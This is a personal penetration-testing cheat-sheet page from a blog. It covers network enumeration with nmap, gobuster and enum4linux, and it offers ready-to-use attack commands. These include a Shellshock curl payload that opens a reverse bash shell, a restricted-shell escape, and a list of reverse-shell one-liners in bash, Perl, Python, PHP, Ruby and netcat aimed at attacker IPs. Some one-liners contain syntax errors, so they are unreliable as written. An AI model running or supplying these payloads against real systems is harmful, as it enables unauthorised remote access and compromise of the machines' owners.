ENUM4LYF

This is going to be an always *under construction* sort of page.
My favorite enumeration techniques will slowly appear here with more and more explanations to follow – remember #DontWaitEnumerate

// Find out what’s connected
netdiscover -r 192.168.0.0/16

// My favorite Nmap scan

nmap -sS -A -O -n -T5 192.168.1.131

-sS = SynScan
-A = Os/Version/Script/Tracerout
-O = Operating system
-T5 = Time duration

// usage of curl to show robots.txt file

curl -h https://192.168.1.131/robots.txt

// example of curl to establish bash shell into a server running on squid port

curl -x [proxyIP:squidport] -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/192.168.1.128/9999 0>&1" http://192.168.1.129/cgi-bin/status [shellshock revese tcp]

-x use proxy
-H update user agent header

// bruteforce fuzzing

gobuster -u [targetIP]-w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e

-u = Target
-w = Worldist
-s = String usage -s ‘200,204’
-e = expanded [true / enables function]

// further enumeration
enum4linux [target]

// connect to an MySQL servier
mysql -h localhost -P 3306 -u root -p [db_name]

// Mount a shared folder that is not secured
mkdir /mnt/cifs
mount -t cifs //[target-ip]/share$ -o username=guest /mnt/cifs/
ls /mnt/cifs/

// Attempt to ssh
ssh user@[targetIP]
then enter password

// when in first things first – try sudo su with same password!!! //

// Also try [p00p]

BASH_CMDS[poop]=/bin/bash
poop
cd /tmp
/tmp$ ls -lah
total 8.0K
4.0K drwxrwxrwt 2 root root 4.0K

// *** REVERSE SHELL CHEATS *** //
Another place to look is PentestMonkeys!

// BASH SHELLS
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

// PERL
perl -e ‘use Socket;$i=”10.0.0.1″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’

// PYTHON 
This was tested under Linux / Python 2.7:
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

// PHP
php -r ‘$sock=fsockopen(“192.168.1.1”,9999);exec(“/bin/sh -i <&3 >&3 2>&3”);’
If you want a .php file to upload, see the more featureful and robust php-reverse-shell.

// RUBY
ruby -rsocket -e’f=TCPSocket.open(“192.168.1.1”,9999)).to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’

// NETCAT
nc -e /bin/sh 192.168.1.1,9999)

 

 

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s